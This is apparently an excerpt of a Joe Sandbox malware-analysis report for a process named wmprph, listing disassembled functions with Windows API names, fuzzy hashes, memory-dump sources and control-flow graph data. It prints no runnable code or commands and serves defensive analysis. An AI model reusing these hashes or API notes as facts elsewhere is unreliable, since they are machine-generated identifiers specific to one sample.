                                                                                                                                                                                                                                                                                                              • Instruction ID: c57a6f22f1b14e189c98fd0f613a3e0ac44d159e647c8a64764fd37cb029bb6d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41318131214A4C8FDB59EF25D8C96EEB3D5FBA4301F91862AF44BC3196EA34D60D8781
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0BA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                              • String ID: P
                                                                                                                                                                                                                                                                                                              • API String ID: 716092398-3110715001
                                                                                                                                                                                                                                                                                                              • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                                                                                                                                              • Instruction ID: e722b21f8589767e8bf1a2a07a3144f8bde7753992728681b42d4721791fd934
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80515270518B848FD765EF24D88A79ABBE4FB95311F508A2EE08EC2290DF349545CF83
                                                                                                                                                                                                                                                                                                              Function 00000242C8C022D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 342 242c8c022d4-242c8c02303 GetSystemInfo 343 242c8c02313-242c8c02329 342->343 344 242c8c02305-242c8c02310 342->344 345 242c8c0232f-242c8c02332 343->345 344->343 346 242c8c02334-242c8c02337 345->346 347 242c8c0234e-242c8c02354 345->347 348 242c8c02349-242c8c0234c 346->348 349 242c8c02339-242c8c0233c 346->349 350 242c8c02356-242c8c02366 347->350 351 242c8c023cf-242c8c023d2 347->351 348->345 349->348 353 242c8c0233e-242c8c02343 349->353 354 242c8c02395-242c8c0239b 350->354 352 242c8c0245e 351->352 355 242c8c0246b-242c8c02482 352->355 356 242c8c02460-242c8c02463 352->356 353->348 357 242c8c024b1-242c8c024c3 353->357 358 242c8c02368-242c8c0237f 354->358 359 242c8c0239d 354->359 363 242c8c02484-242c8c0249e 355->363 361 242c8c023d7-242c8c023f5 356->361 362 242c8c02469 356->362 358->359 371 242c8c02381-242c8c02389 358->371 360 242c8c0239f-242c8c023a2 359->360 360->351 364 242c8c023a4-242c8c023c4 VirtualAlloc 360->364 366 242c8c02437 361->366 367 242c8c023f7-242c8c0240e 361->367 362->357 363->363 365 242c8c024a0-242c8c024ab 363->365 364->355 369 242c8c023ca-242c8c023cd 364->369 365->357 370 242c8c02439-242c8c0243c 366->370 367->366 375 242c8c02410-242c8c02418 367->375 369->350 369->351 370->357 373 242c8c0243e-242c8c0245c 370->373 371->360 374 242c8c0238b-242c8c02393 371->374 373->352 374->354 374->359 375->370 376 242c8c0241a-242c8c02435 375->376 376->366 376->367
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AllocInfoSystemVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3440192736-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                                                                                                                                              • Instruction ID: 532ed21f31789759c8a636965a9661a77a4876784abfb59b343e8cc0e4fdbe49
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C51D130218E0D8FFB5AEA6DD48C36D72D5FB98382F91812EE449C7195EB64C98D87C1
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0D7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseFileHandleView
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3964672402-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6ba1fc2fea0838dd11d7f6309bcbe533f0eff26d9d608406bc2b4f7feb0acd22
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B4172312149088FEB49FB69D8C9BAA73D4EF95346F41422AF40AC2192DF34DA498BC1
                                                                                                                                                                                                                                                                                                              Function 00000242C8C02978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                                                                                                                                                                              • Instruction ID: d5fa1baf8dad384d045885b9dc70bd0b3ffd8990f3d9c27a8608e044fec3033f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB317B2020CA448FEB159B7CD8D87597BC5FB4A311F56429AF88DC72C9CB58C80AC385
                                                                                                                                                                                                                                                                                                              Function 00007DF47DF412C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2961719491.00007DF47DF41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF47DF41000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_7df47df41000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                                                                                                                                                                              • Instruction ID: ca7e44a69bfc3e73eab6b259c8c5c2ae84e15cbd89d2d7c6b01d1b9f57cb9dc3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F21F731628DC547EB18DB2CD464676B3F1FF94340F24413AE88FC7A85E769E88982E5
                                                                                                                                                                                                                                                                                                              Function 00007DF47DF312C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000003.2681625902.00007DF47DF31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF47DF31000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_3_7df47df31000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                                                                                                                                                                              • Instruction ID: dd049734acb19f7a30f46d80337db1afa29cf1a3e72f33d81fd4f7a9c81deec2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF21F73161CEC547EB1C9B2CD484676B3F1FF94300F15413AE88BC7A85E669E88982E5
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0CC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                                                                                                                                                                              • Instruction ID: 096f4d9d8d8d17f7adef83b3d858beff7609f105254de63cc9adc2d02b599fcf
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A71C531208B088FD76DDB19D8C5A6973E1FB94711F52861EE48BC3591DB30EA4E87C5
                                                                                                                                                                                                                                                                                                              Function 00000242C8C06C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2451b520613407fd1c8f51c9f082d2c00f53644b9e7c6c4ea700f1289c48f4b4
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1419B30214B0886EB5DAB39D8D97AE32D5EF94352F85861BF416C31D2DF24DB0D46C1
                                                                                                                                                                                                                                                                                                              Function 00000242C8C077DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                                                                                                                                                                              • Instruction ID: bd4aecb476a32281b9fcc71fab70249c95e9f8258b1ffd82ea447ff74ce560ff
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7412D711186488BE75AEB25C8D87EFB7E0FB94345F418A1EF08AC2191DF7596098B82
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0CEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6a2a0753cc3c9120a7519915e5f7dc9bfdee250fc25f96460ae50f5b410e6ee6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A101AD71204A0C8FDB45EB19D8C59ADB3E9FBE8301F51862AE84AC2140EB64DA198781
                                                                                                                                                                                                                                                                                                              Function 00000242C8C02908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                                                                                                                                                                              • Instruction ID: d709bff3d0e8eba8f58b05b5564177bc4d99d01cfe20dfa9c2c92323bb78e3bb
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 470126317089198FEB59A77EDC88A2933D5FB89352B858079E80EC3154DB399C49CB80
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0BEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                                                                                                                                                                              • Instruction ID: dce23a24a3497f9ee086d6a518e9cdaa2ce4d094a8bbdd854bead0c078b2017b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F018630614A4C5FF749EB39C89977E3696EF64302F91857BB05AC3291DA28CA0C8781
                                                                                                                                                                                                                                                                                                              Function 00000242C8C02B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0f62d7453f072e6ad2c2d1b912c160162756c2cf7f5c6414d98025fa49d87c39
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F0A761604A05CBF759AFB79CC82192251DB44353FD6893FE006C7180DA39854D5280
                                                                                                                                                                                                                                                                                                              Function 00000242C8C069B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 5566f96b1d78c6abdb520871269893ec178f156d9cbf0b9e5e75cc54026f6fb6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE0C211704D190BABAC62BE64CC67A51C6CBDC1B3754427BF41DC3295ED50CC894390
                                                                                                                                                                                                                                                                                                              Function 00007DF47DF41290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2961719491.00007DF47DF41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF47DF41000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_7df47df41000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                                                                                                                                                                              • Instruction ID: b2850edc5fa926a965f7d38778ee6ff3d1b5e9aa42c8fdf43ccd9e573069fd83
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E04F309149054BEBA8D61DC90975136E0EB5C306F604669D505C9291DB39989BCFC1
                                                                                                                                                                                                                                                                                                              Function 00000242C8C074F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                                                                                                                                                                              • Instruction ID: cd7f0ac6dae4a8c95ff9540418a975bf94c2ac65de0e99dc7dc5cb5a7835276a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE916030218A088FDB4DEF19D8C9AEA77A0FF55341F81852AF44AC7196DF30E959CB81
                                                                                                                                                                                                                                                                                                              Function 00000242C8C03C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                                                                                                                                                                              • Instruction ID: 68ecc1df49396024042c365742f9e90e8f8d98a5ef729039cc0638dfde71ecbd
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0E04F302009058BEFACDB2DC88D35436D0EB98306FA08259E405CA291CB39C8AFCF82
                                                                                                                                                                                                                                                                                                              Function 00007DF47DF31290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000003.2681625902.00007DF47DF31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF47DF31000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_3_7df47df31000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                                                                                                                                                                              • Instruction ID: ee16943c9c32591f9393c5a4732a7847090cbd89877eb079ac102b9cafa7096b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2E04F30914D455BEB98D61DC849B503BE0EB5830AF604669D505C9291DB79D49BCF81
                                                                                                                                                                                                                                                                                                              Function 00000242C8C0698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000015.00000002.2960328323.00000242C8C01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000242C8C01000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_242c8c01000_wmprph.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
